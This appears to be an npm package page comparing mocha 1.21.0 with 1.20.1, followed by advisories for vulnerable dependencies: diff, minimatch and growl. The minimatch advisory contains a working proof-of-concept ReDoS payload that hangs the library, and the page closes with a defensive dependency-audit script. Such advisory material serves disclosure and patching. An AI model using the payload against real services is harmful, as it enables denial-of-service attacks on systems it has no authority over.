Mocha version 1.21.0 arrived on July 24, 2014, succeeding version 1.20.1, released on June 4, 2014. Both versions maintain the core "simple, flexible, fun" testing framework promise, sharing key dependencies like 'diff' (1.0.7), 'glob' (3.2.3), 'jade' (0.26.3), the wildcard version of 'debug', 'mkdirp' (0.3.5), and 'commander' (2.0.0). Development dependencies remain consistent with 'should' (~4.0.0) and 'coffee-script' (1.2), ensuring continuity for developers relying on these tools for testing and compilation. The repository URL and author information are also identical, reflecting consistent ownership and development practices.
The primary, and perhaps most noticeable, difference lies in the 'growl' dependency. Version 1.20.1 relies on 'growl' 1.7.x, while version 1.21.0 updates this to 'growl' 1.8.x. While seemingly minor, this update could bring bug fixes, performance improvements, or new features to growl notifications, affecting users who rely on growl for test result feedback. Developers should review the growl 1.8.x changelog to understand the precise implications of this update for their testing workflows. Small as it is, the growl change matters for developers who need a stable notification setup.
Both versions are available via npm and share the same author and repository, making upgrades relatively seamless. Developers should always evaluate dependency updates to ensure compatibility with their existing projects.
All vulnerabilities related to version 1.21.0 of the package
Regular Expression Denial of Service (ReDoS)
A vulnerability was found in diff before v3.5.0. The affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
```javascript
var minimatch = require("minimatch");

// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};

// pathological pattern: an unterminated character class followed by ~1e6 backslashes
var exploit = "[!" + genstr(1000000, "\\") + "A";

// minimatch exploit: matching against this pattern hangs on affected versions
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
```
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.
Growl before 1.10.0 vulnerable to Command Injection
Affected versions of growl do not properly sanitize input prior to passing it into a shell command, allowing for arbitrary command execution.
Update to version 1.10.0 or later.
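The three advisories above (diff before 3.5.0, minimatch before 3.0.2, growl before 1.10.0) all concern transitive dependencies of mocha 1.21.0. The following is an added example, not code from this page or from the mocha project: it walks an `npm ls --json`-style dependency tree and flags any package installed below the fixed version the advisories name. The sample tree is constructed for illustration (the exact nested versions a real install resolves to are assumptions).

```javascript
// Fixed versions taken from the advisories on this page.
const FIXED = {
  diff: '3.5.0',      // ReDoS fixed in v3.5.0
  minimatch: '3.0.2', // ReDoS via the pattern argument fixed in 3.0.2
  growl: '1.10.0',    // command injection fixed in 1.10.0
};

// Minimal semver comparison: major.minor.patch only, pre-release tags ignored.
// Returns <0 if a < b, 0 if equal, >0 if a > b.
function cmpVersion(a, b) {
  const pa = a.split('-')[0].split('.').map(Number);
  const pb = b.split('-')[0].split('.').map(Number);
  for (let i = 0; i < 3; i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}

// Recursively walk the tree and collect { name, version, path, fixedIn }
// for every package whose installed version is below its fixed version.
function audit(tree, path = [], out = []) {
  for (const [name, info] of Object.entries(tree.dependencies || {})) {
    const here = [...path, `${name}@${info.version}`];
    if (FIXED[name] && cmpVersion(info.version, FIXED[name]) < 0) {
      out.push({ name, version: info.version, path: here.join(' > '), fixedIn: FIXED[name] });
    }
    audit(info, here, out);
  }
  return out;
}

// Constructed sample resembling `npm ls --json` output for a project on mocha 1.21.0.
// Nested versions are assumed for illustration, not taken from a real install.
const SAMPLE_TREE = {
  dependencies: {
    mocha: {
      version: '1.21.0',
      dependencies: {
        diff: { version: '1.0.7' },
        growl: { version: '1.8.1' },
        glob: { version: '3.2.3', dependencies: { minimatch: { version: '0.2.14' } } },
        commander: { version: '2.0.0' },
      },
    },
  },
};

for (const f of audit(SAMPLE_TREE)) console.log(`${f.path}: upgrade ${f.name} to >= ${f.fixedIn}`);
```

Running it against a real tree is a matter of replacing SAMPLE_TREE with `JSON.parse(require('child_process').execSync('npm ls --json --all'))`.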